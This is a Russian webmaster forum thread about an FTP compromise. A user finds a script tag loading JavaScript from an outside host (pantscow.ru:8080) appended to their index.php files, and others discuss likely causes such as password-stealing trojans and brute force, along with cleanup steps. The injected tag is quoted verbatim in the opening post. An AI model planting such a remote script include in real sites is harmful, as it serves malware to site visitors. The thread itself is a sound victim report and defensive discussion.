Ломанули фтп. че этот скрипт делает?

12
C
На сайте с 26.08.2008
Offline
120
2114

Сегодня захожу на свои сайты, вижу только белый экран и больше ничего.

Открываю файлы index.php и на всех доменах вконце приписана строчка

<script type="text/javascript" src="http://pantscow.ru:8080/Screenshot.js"></script>

<!--8e77177161d0b233c438b7b8f04c2d39-->

Пароли у меня были в файле опенофиса, как могли завладеть фтп? И что делает этот скрипт.

------------------------
TAFF
На сайте с 28.08.2008
Offline
140
#1
Choco:
как могли завладеть фтп?

- Пинч

- Брут

- Лом хостера

✓ Администрирование (/ru/forum/494299) | ✓ Домены (/ru/forum/298049) | ✓ Продажа аккаунтов narod.ru (/ru/forum/585347)
ewg777
На сайте с 04.06.2007
Offline
225
#2

Недостаточно безопасно использовали ftp-доступ и ПК.

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=ru&site=http://pantscow.ru:8080/Screenshot.js

C
На сайте с 26.08.2008
Offline
120
#3

Просто в файле где пароль от фтп, у меня около 200 паролей, их все нужно менять в срочном порядке?

Сейчас я из убунты сижу, начал потихоньку менять пароли, меня прежде всего интересует что у меня своравали)

Mad_Man
На сайте с 10.11.2008
Offline
162
#4
Choco:
Сейчас я из убунты сижу, начал потихоньку менять пароли

Взлом убунты? Господа, галактеко вопасносте.

P
На сайте с 16.07.2010
Offline
0
#5

у меня та же проблема. а кто ваш хостер? у меня ru-center

sealord
На сайте с 03.10.2003
Offline
128
#6

Была такая фигня с одним из сайтов, только разобрался (хостинг hc.ru).

Насколько понял был троян на локальной машине у клиента и он через FTP вирь заливал.

Кроме индексных файлов проверьте ещё .js файлы, у меня в них тоже дописывал, а также папки движка на предмет левых файлов с кривыми названиями.

Вобщем вылечил сменой паролей на FTP и заменой убитых из архива или правкой дописанных файлов.

Ora et labora
Mad_Man
На сайте с 10.11.2008
Offline
162
#7
sealord:
Насколько понял был троян на локальной машине у клиента
Choco:
Сейчас я из убунты сижу

Кому-нибудь вообще интересно, что у ТС линь?

ewg777
На сайте с 04.06.2007
Offline
225
#8
Mad_Man:
Кому-нибудь вообще интересно, что у ТС линь?

И что ?

Mad_Man
На сайте с 10.11.2008
Offline
162
#9
ewg777:
И что ?

Не, ну тут советуют искать пинчи\трояны на стороне клиента...

P
На сайте с 16.07.2010
Offline
0
#10

у меня поменяли файлы default*.php, index.php, index*.htm, index*.html и некоторые *.js. Меняли с 18-20 машин одновременно около 3х часов (700 файлов). Пароли хранились в менеджере ftp FAR. ОС Win XP.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий